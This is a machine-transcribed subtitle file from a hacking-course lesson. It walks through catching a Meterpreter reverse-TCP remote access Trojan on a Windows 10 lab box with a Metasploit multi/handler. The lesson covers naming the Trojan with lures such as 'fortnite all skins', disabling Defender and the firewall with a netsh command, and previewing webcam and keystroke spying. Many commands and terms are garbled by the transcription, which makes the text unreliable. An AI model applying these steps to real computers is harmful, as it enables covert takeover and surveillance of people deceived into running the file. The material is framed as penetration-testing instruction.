1 00:00:03,100 --> 00:00:07,330 Welcome to Hacking Windows, Tim Command and control phase. 2 00:00:07,990 --> 00:00:14,530 Before we get into commanding, controlling or taking over control of Windows 10 machine through the 3 00:00:14,530 --> 00:00:20,530 malware that we created in the previous section, let's do a quick recap of that attack phase, because 4 00:00:20,530 --> 00:00:26,770 that's what we're going to need to do every time we want to create a new virus from a new IP address. 5 00:00:27,280 --> 00:00:35,350 So what we did in the last section was we created an executable file using MSF venom to create a reverse 6 00:00:35,350 --> 00:00:38,110 TCAP Materne critter virus. 7 00:00:38,230 --> 00:00:44,890 So we created what we call a remote access Trojan, a piece of malware that when the person runs it 8 00:00:44,950 --> 00:00:52,510 on their machine because we named it something like some cool name a fortnight, all skins or important 9 00:00:52,510 --> 00:00:54,010 PDAF Daddy XY. 10 00:00:55,030 --> 00:01:02,850 As soon as they run that file on their P.C., they're going to do a reverse TCAP or a call back to my 11 00:01:02,860 --> 00:01:09,400 Kelly Linux box and my Kelly Linux box will be able to take control of a Materne critter, a Metis Boit 12 00:01:09,400 --> 00:01:14,470 interpreter, remote shell that will give me full access to that Windows computer. 13 00:01:15,220 --> 00:01:16,840 So we did that with these four commands. 14 00:01:17,380 --> 00:01:21,370 Go back to the previous section if you need to create this Trojan. 15 00:01:23,010 --> 00:01:29,670 Then on our Kelly Linux box, we needed to listen for the exploit to call back. 16 00:01:30,030 --> 00:01:36,180 So our Windows Mateparae to reverse TCAP needs a handler, a listener running on this Caleigh Linux 17 00:01:36,180 --> 00:01:38,880 box to listen for incoming connections. 18 00:01:39,240 --> 00:01:42,960 And we can use just three or four commands to make that possible. 19 00:01:43,270 --> 00:01:48,720 The use exploit multi handler set the payload and then set the local host to your Caleigh IP address. 20 00:01:48,750 --> 00:01:54,090 You just have to tell it what IP address to listen for and then run the exploit with the command exploit 21 00:01:54,090 --> 00:01:54,870 dash jazy. 22 00:01:55,440 --> 00:01:57,150 So we're going to check in here. 23 00:01:57,600 --> 00:02:00,840 I have let it sit between lessons for just a few minutes. 24 00:02:01,140 --> 00:02:03,060 So my interpreter session closed. 25 00:02:03,090 --> 00:02:06,390 That means my Windows computer is no longer communicating. 26 00:02:06,390 --> 00:02:08,370 And in fact, you can see in my downloads folder. 27 00:02:09,060 --> 00:02:11,040 Windows Defender started back up. 28 00:02:11,400 --> 00:02:17,250 So I'd need to reinfect this machine, but I'm going to run those four steps just so that you can see 29 00:02:17,250 --> 00:02:18,060 them one more time. 30 00:02:18,600 --> 00:02:27,120 So if I press enter and I'll use control l to clear the screen, you can see that I'm already using 31 00:02:27,120 --> 00:02:28,710 the exploit multi handler. 32 00:02:28,800 --> 00:02:36,180 So if I just fuse my up arrow, you can see these four important commands use exploit multi handler 33 00:02:36,450 --> 00:02:36,950 anytime. 34 00:02:37,710 --> 00:02:38,970 This is a great thing to point out. 35 00:02:39,660 --> 00:02:43,380 Anytime we want to reuse this same remote access Trojan. 36 00:02:43,740 --> 00:02:46,980 So I created it in the last section and I'm going to use it right now. 37 00:02:47,520 --> 00:02:52,380 But I'm still might lose a connection with that Windows box every now and then, or I might send it 38 00:02:52,380 --> 00:02:56,880 to a new host machine on the network that I'm doing penetration testing for. 39 00:02:57,330 --> 00:02:59,790 And so I need to run this part. 40 00:02:59,850 --> 00:03:04,560 The the virus itself can stay the same as long as your IP address stays the same on Kalli. 41 00:03:05,070 --> 00:03:10,680 But you need to run these four commands inside Materne Critter inside our midst boy framework. 42 00:03:11,070 --> 00:03:16,230 In fact, let's go ahead and show how we would reconnect if you're coming back to this fresh or if you're 43 00:03:16,530 --> 00:03:18,540 infecting a new machine on your network. 44 00:03:18,900 --> 00:03:21,190 First we run the Metis Play Framework console. 45 00:03:21,210 --> 00:03:22,020 So that's M. 46 00:03:22,050 --> 00:03:23,370 S F console. 47 00:03:23,880 --> 00:03:31,200 Or you can come up to your Kalli box here, come down to exploitation tools and find the midpoint framework. 48 00:03:31,710 --> 00:03:34,980 MSF console takes just a moment to get up and running. 49 00:03:36,400 --> 00:03:44,350 Once Miss Boyd opens up, we just need to say use, exploit, slash, multi slash handler. 50 00:03:47,130 --> 00:03:49,170 And we can put back to our screen here. 51 00:03:49,600 --> 00:03:50,790 There we go. 52 00:03:51,270 --> 00:03:52,760 We can say use, exploit, multi handler. 53 00:03:52,770 --> 00:03:59,340 We need to set the payload to match that maternal or reverse TCAP Trojan that we have on our other machine. 54 00:03:59,370 --> 00:04:00,540 I'll control L. 55 00:04:01,560 --> 00:04:03,600 So we did the use exploit multi handler. 56 00:04:04,770 --> 00:04:07,560 It remembers our last few commands from the last time we logged in. 57 00:04:07,570 --> 00:04:11,940 So that's a really nice thing to be able to just scroll back through those, set the payload to windows, 58 00:04:11,940 --> 00:04:14,400 slash mature operator slash reverse TCAP. 59 00:04:16,170 --> 00:04:27,870 And then we need to set the L host the local host parameter so I can double check with IPA that my address 60 00:04:27,870 --> 00:04:30,780 is still tendo dot nine dot seven on this Caleigh box. 61 00:04:30,800 --> 00:04:33,060 You need to make sure you set your local host to the correct one. 62 00:04:33,570 --> 00:04:35,820 And the last command that we need is just exploit. 63 00:04:36,060 --> 00:04:39,120 So you can run, exploit, dash J, dash Z, exploit X. 64 00:04:39,900 --> 00:04:42,600 Those are options to background multiple sessions. 65 00:04:42,600 --> 00:04:46,950 If we want to we can just say exploit and we are listening. 66 00:04:47,010 --> 00:04:50,130 At that point actively for connections from windows. 67 00:04:50,670 --> 00:04:55,380 So over here on our Windows box, we probably want to do two quick things will turn off that virus protection. 68 00:04:55,410 --> 00:04:56,660 I'm sure it started back up. 69 00:04:58,050 --> 00:05:03,280 Virus and threat protection settings, we can open that every now and then it will automatically start 70 00:05:03,280 --> 00:05:03,880 back up. 71 00:05:04,780 --> 00:05:06,190 Go to our Manege settings. 72 00:05:06,850 --> 00:05:08,980 We'll make sure that Real-Time protection is turned off. 73 00:05:09,640 --> 00:05:12,790 And we might want to add an exclusion. 74 00:05:13,570 --> 00:05:15,310 And I've added our documents folder. 75 00:05:15,310 --> 00:05:20,500 So this time when I get into that Windows machine, I'm actually going to upload another copy of this 76 00:05:20,500 --> 00:05:22,600 virus to that documents folder. 77 00:05:23,110 --> 00:05:25,750 And Windows shouldn't close it out. 78 00:05:26,140 --> 00:05:29,450 And I'm going to double check here that my Windows firewall is off. 79 00:05:29,470 --> 00:05:31,540 This command net S.H. Advance firewall set. 80 00:05:31,540 --> 00:05:32,770 All profiles stayed off. 81 00:05:33,990 --> 00:05:39,810 Now, there are ways that we can get around antivirus using a veil of Asian or some of the other tools 82 00:05:39,810 --> 00:05:42,600 to encode our exploit. 83 00:05:43,680 --> 00:05:50,880 And there are ways that you can mess with the Windows firewall or get packets out using a commonly open 84 00:05:50,880 --> 00:05:52,080 port like secure shell. 85 00:05:52,410 --> 00:05:55,530 So it makes it look like you're just surfing for a Web page. 86 00:05:55,890 --> 00:06:00,180 But what we're doing right now is just to make it a little easier for this first command and control 87 00:06:00,180 --> 00:06:00,840 experience. 88 00:06:01,170 --> 00:06:07,560 With those few things in place, I should be able to download my fortnight all skins one more time. 89 00:06:07,710 --> 00:06:08,250 Save it. 90 00:06:10,610 --> 00:06:11,530 Open the folder. 91 00:06:13,580 --> 00:06:16,490 And then double click to run that executable. 92 00:06:18,330 --> 00:06:24,460 And it says, hey, this may be an unrecognized app, but if you click more info, you can run anyway. 93 00:06:25,960 --> 00:06:29,260 And you can see we have started a Turtur session. 94 00:06:29,740 --> 00:06:38,950 And if I say help, interpreter will give me dozens of commands that I can run on this Windows host 95 00:06:39,040 --> 00:06:39,910 that is infected. 96 00:06:40,600 --> 00:06:43,330 When we come back in the next section, we're going to add the next lesson. 97 00:06:43,480 --> 00:06:46,640 We're going to see how to take command and control. 98 00:06:46,660 --> 00:06:54,640 We'll be able to do everything from upload and download files, look for Web cameras, webcams attached 99 00:06:54,640 --> 00:06:55,750 to the computer. 100 00:06:56,110 --> 00:06:58,930 We'll be able to sniff keystrokes. 101 00:06:59,230 --> 00:07:01,890 Just about everything that you've ever feared or seen in a movie. 102 00:07:01,970 --> 00:07:03,670 We'll show you that most of it is real. 103 00:07:03,970 --> 00:07:08,110 You're going to see why you never want to download and run a file from a suspicious source. 104 00:07:08,290 --> 00:07:09,730 We'll see you in the next lesson.